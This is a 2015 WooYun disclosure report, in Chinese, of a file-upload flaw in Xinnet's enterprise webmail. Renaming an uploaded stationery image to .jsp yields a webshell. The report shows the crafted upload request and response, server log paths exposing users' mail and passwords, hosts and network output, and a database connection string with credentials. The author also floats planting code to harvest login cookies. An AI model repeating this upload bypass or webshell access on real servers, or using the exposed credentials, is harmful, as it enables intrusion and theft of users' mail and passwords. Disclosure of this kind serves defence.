新网企业邮箱服务可以shell影响（从任意用户域可拿新网服务器shell）

发表于 2015年06月17日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0121037

漏洞标题：新网企业邮箱服务可以shell影响（从任意用户域可拿新网服务器shell）

相关厂商：新网华通信息技术有限公司

漏洞作者：鸟云厂商

提交时间：2015-06-17 11:42

公开时间：2015-08-01 13:14

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签：

漏洞详情

披露状态：

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-17: 厂商已经确认，细节仅向厂商公开
2015-06-27: 细节向核心白帽子及相关领域专家公开
2015-07-07: 细节向普通白帽子公开
2015-07-17: 细节向实习白帽子公开
2015-08-01: 细节向公众公开

简要描述：

我只想说，新网我们到底还能不能好好做朋友了？

详细说明：

新网企业邮箱服务http://www.xinnet.com/mail/mail.html该服务可以购买，一年也就几百块钱。大量企业在用，包括新网自己家由于已经有了一个管理员账号，所以不用再去购买了。我们直接测试http://webmail.xinnet.asia/（可以是任意一个新网企业邮箱）以管理员账户登录企业信息设置---企业信纸

添加新信纸---上传图片

抓包

POST /app/eadmin/uploadStationeryPic HTTP/1.1<br>
Host: webmail.xinnet.asia<br>
Proxy-Connection: keep-alive<br>
Content-Length: 6837<br>
Cache-Control: max-age=0<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br>
Origin: http://webmail.xinnet.asia<br>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36<br>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryu48IEN2y86aEeP0U<br>
DNT: 1<br>
Referer: http://webmail.xinnet.asia/app/eadmin/qyxz<br>
Accept-Encoding: gzip, deflate<br>
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4<br>
Cookie: LASTLOGINACCOUNT=x********a; zmail300_language=CN; JSESSIONID=7*******8E51------WebKitFormBoundaryu48IEN2y86aEeP0U<br>
Content-Disposition: form-data; name="inputfile"; filename="wooyun1.jpg"<br>
Content-Type: image/jpeg

POST /app/eadmin/uploadStationeryPic HTTP/1.1

Host: webmail.xinnet.asia

Proxy-Connection: keep-alive

Content-Length: 6837

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://webmail.xinnet.asia

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryu48IEN2y86aEeP0U

DNT: 1

Referer: http://webmail.xinnet.asia/app/eadmin/qyxz

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

Cookie: LASTLOGINACCOUNT=x********a; zmail300_language=CN; JSESSIONID=7*******8E51------WebKitFormBoundaryu48IEN2y86aEeP0U

Content-Disposition: form-data; name="inputfile"; filename="wooyun1.jpg"

Content-Type: image/jpeg

filename修改为wooyun.jsp返回数据，得到路径

HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Tue, 16 Jun 2015 16:45:01 GMT<br>
Content-Type: text/html;charset=utf-8<br>
Connection: keep-alive<br>
Pragma: no-cache<br>
Expires: Thu, 01 Jan 1970 00:00:00 GMT<br>
Cache-Control: no-cache<br>
Cache-Control: no-store<br>
Content-Length: 129{"imgsrc":"/usr/zweb/forspringwork/zweb/template/stationery/img/00/xinnet.asia/temp/2015_6_17_1198739863.jsp","status":"success"}

HTTP/1.1 200 OK

Server: nginx

Date: Tue, 16 Jun 2015 16:45:01 GMT

Content-Type: text/html;charset=utf-8

Connection: keep-alive

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Cache-Control: no-cache

Cache-Control: no-store

Content-Length: 129{"imgsrc":"/usr/zweb/forspringwork/zweb/template/stationery/img/00/xinnet.asia/temp/2015_6_17_1198739863.jsp","status":"success"}

菜刀连接之

此处ip不恒定，貌似是负载还是啥的查看用户的邮件发送记录（随机新网企业邮箱用户）

/var/umail/javaapps/zmail4.0/logs/sendMail.log

1	/var/umail/javaapps/zmail4.0/logs/sendMail.log

查看企业邮箱管理员操作记录（随机新网企业邮箱管理员）

/var/umail/javaapps/zmail4.0/logs/adminAccess.log

1	/var/umail/javaapps/zmail4.0/logs/adminAccess.log

查看登录记录（随机新网企业邮箱用户）

/var/umail/javaapps/zmail4.0/logs/webmail.log

1	/var/umail/javaapps/zmail4.0/logs/webmail.log

查看用户修改密码行为，不断更新，并且可以看到旧密码

/var/umail/logs/mailgateway_operation.log

1	/var/umail/logs/mailgateway_operation.log

查看用户发送的邮件内容

/var/umail/storage/cache/20150617

1	/var/umail/storage/cache/20150617

cache文件夹会有每天的邮件缓存，可以分时、分域名查看用户邮件<img src="http://www.secevery.com/upload/201506/17021440e4a3d6842javascript:void(0)a3af2b2a4a94c5eef7978be.png" />可以修改不同企业邮箱登录口源码，可以改个代码什么的，密码往我这里发一份：）直接改企业邮箱主代码，任意用户登录后我都可以收到cookie。这里还是不演示为好= =

/var/umail/javaapps/usr/usr/zweb/loginCustom/

1	/var/umail/javaapps/usr/usr/zweb/loginCustom/

host配置，邮件服务器

[/var/umail/javaapps/zmail4.0/]$ cat /etc/hosts<br>
# Do not remove the following line, or various programs<br>
# that require network functionality will fail.<br>
127.0.0.1    web1 localhost<br>
::1		localhost6.localdomain6 localhost6<br>
121.14.68.78   pop.xinnetdns.com

[/var/umail/javaapps/zmail4.0/]$ cat /etc/hosts

# Do not remove the following line, or various programs

# that require network functionality will fail.

127.0.0.1 web1 localhost

::1 localhost6.localdomain6 localhost6

121.14.68.78 pop.xinnetdns.com

网卡信息，在内网

[/var/umail/javaapps/zmail4.0/]$ ifconfig<br>
eth0      Link encap:Ethernet  HWaddr 00:1B:78:99:24:3A<br>
          inet addr:121.**.*.76  Bcast:121.14.3.95  Mask:255.255.255.224<br>
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1<br>
          RX packets:3640668075 errors:0 dropped:92535 overruns:0 frame:0<br>
          TX packets:4068494914 errors:0 dropped:0 overruns:0 carrier:0<br>
          collisions:0 txqueuelen:1000<br>
          RX bytes:1433004161193 (1.3 TiB)  TX bytes:3637010612570 (3.3 TiB)<br>
          Interrupt:169 Memory:f8000000-f8012800eth1      Link encap:Ethernet  HWaddr 00:1B:78:99:24:38<br>
          inet addr:10.2.**.12  Bcast:10.2.50.63  Mask:255.255.255.192<br>
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1<br>
          RX packets:7687231891 errors:4 dropped:3669985 overruns:0 frame:4<br>
          TX packets:8463979669 errors:0 dropped:0 overruns:0 carrier:0<br>
          collisions:0 txqueuelen:1000<br>
          RX bytes:5663583198250 (5.1 TiB)  TX bytes:7495389851878 (6.8 TiB)<br>
          Interrupt:177 Memory:fa000000-fa012800lo        Link encap:Local Loopback<br>
          inet addr:127.0.0.1  Mask:255.0.0.0<br>
          UP LOOPBACK RUNNING  MTU:16436  Metric:1<br>
          RX packets:1555579120 errors:0 dropped:0 overruns:0 frame:0<br>
          TX packets:1555579120 errors:0 dropped:0 overruns:0 carrier:0<br>
          collisions:0 txqueuelen:0<br>
          RX bytes:3159991245155 (2.8 TiB)  TX bytes:3159991245155 (2.8 TiB)lo:0      Link encap:Local Loopback<br>
          inet addr:202.**.**.9  Mask:255.255.255.255<br>
          UP LOOPBACK RUNNING  MTU:16436  Metric:1lo:1      Link encap:Local Loopback<br>
          inet addr:123.**.**.9  Mask:255.255.255.255<br>
          UP LOOPBACK RUNNING  MTU:16436  Metric:1lo:2      Link encap:Local Loopback<br>
          inet addr:202.**.**.14  Mask:255.255.255.255<br>
          UP LOOPBACK RUNNING  MTU:16436  Metric:1lo:3      Link encap:Local Loopback<br>
          inet addr:122.13.221.71  Mask:255.255.255.255<br>
          UP LOOPBACK RUNNING  MTU:16436  Metric:1

[/var/umail/javaapps/zmail4.0/]$ ifconfig

eth0 Link encap:Ethernet HWaddr 00:1B:78:99:24:3A

inet addr:121.**.*.76 Bcast:121.14.3.95 Mask:255.255.255.224

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:3640668075 errors:0 dropped:92535 overruns:0 frame:0

TX packets:4068494914 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:1433004161193 (1.3 TiB) TX bytes:3637010612570 (3.3 TiB)

Interrupt:169 Memory:f8000000-f8012800eth1 Link encap:Ethernet HWaddr 00:1B:78:99:24:38

inet addr:10.2.**.12 Bcast:10.2.50.63 Mask:255.255.255.192

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:7687231891 errors:4 dropped:3669985 overruns:0 frame:4

TX packets:8463979669 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:5663583198250 (5.1 TiB) TX bytes:7495389851878 (6.8 TiB)

Interrupt:177 Memory:fa000000-fa012800lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:1555579120 errors:0 dropped:0 overruns:0 frame:0

TX packets:1555579120 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:3159991245155 (2.8 TiB) TX bytes:3159991245155 (2.8 TiB)lo:0 Link encap:Local Loopback

inet addr:202.**.**.9 Mask:255.255.255.255

UP LOOPBACK RUNNING MTU:16436 Metric:1lo:1 Link encap:Local Loopback

inet addr:123.**.**.9 Mask:255.255.255.255

UP LOOPBACK RUNNING MTU:16436 Metric:1lo:2 Link encap:Local Loopback

inet addr:202.**.**.14 Mask:255.255.255.255

UP LOOPBACK RUNNING MTU:16436 Metric:1lo:3 Link encap:Local Loopback

inet addr:122.13.221.71 Mask:255.255.255.255

UP LOOPBACK RUNNING MTU:16436 Metric:1

找到了数据库配置文件

<T>XDB</T><br>
<X><br>
com.mysql.jdbc.Driver<br>
jdbc:mysql://10.2.50.60:3306/mail_account?user=umail&password=umail_password<br>
</X>

<X>

com.mysql.jdbc.Driver

jdbc:mysql://10.2.50.60:3306/mail_account?user=umail&password=umail_password

</X>

分库太多了，几千个。具体多少用户无法估算，mysql当前用户有些语句执行不了给个示例，随便个用户id都到80000级别了，并且能返回密码md5

漏洞证明：

修复方案：

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-06-1713:13

厂商回复：

[email protected]，小新正在玩命确认及修复中

评价

2010-01-01 00:00 Jumbo 白帽子 | Rank:52 漏洞数:5)

新网已被轮
2010-01-01 00:00 无名白帽子 | Rank:32 漏洞数:3)

卧槽。。。
2010-01-01 00:00 牛小帅白帽子 | Rank:407 漏洞数:34)

感觉要出很多钱哈哈
2010-01-01 00:00 浅蓝白帽子 | Rank:131 漏洞数:20)

新网：什么仇什么怨?都来轮我
2010-01-01 00:00 ’‘Nome 白帽子 | Rank:57 漏洞数:7)

感觉。。。。。一次打雷。。。下个就很普通了。。。。。
2010-01-01 00:00 牛小帅白帽子 | Rank:407 漏洞数:34)

@浅蓝哈哈又看到你了我昨天那个注入还是不知道怎么办，也不知道算不算注入
2010-01-01 00:00 http://www.wooyun.org/corps/盛大网络白帽子 | Rank:0 漏洞数:0)

名字起的很屌
2010-01-01 00:00 浅蓝白帽子 | Rank:131 漏洞数:20)

@牛小帅我用不了电脑，也没法给你看
2010-01-01 00:00 牛小帅白帽子 | Rank:407 漏洞数:34)

@浅蓝好吧呜呜 [email protected] 你帮我看看我的步骤
2010-01-01 00:00 BeenQuiver 白帽子 | Rank:50 漏洞数:6)

吊炸天

原文连接：新网企业邮箱服务可以shell影响（从任意用户域可拿新网服务器shell） 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。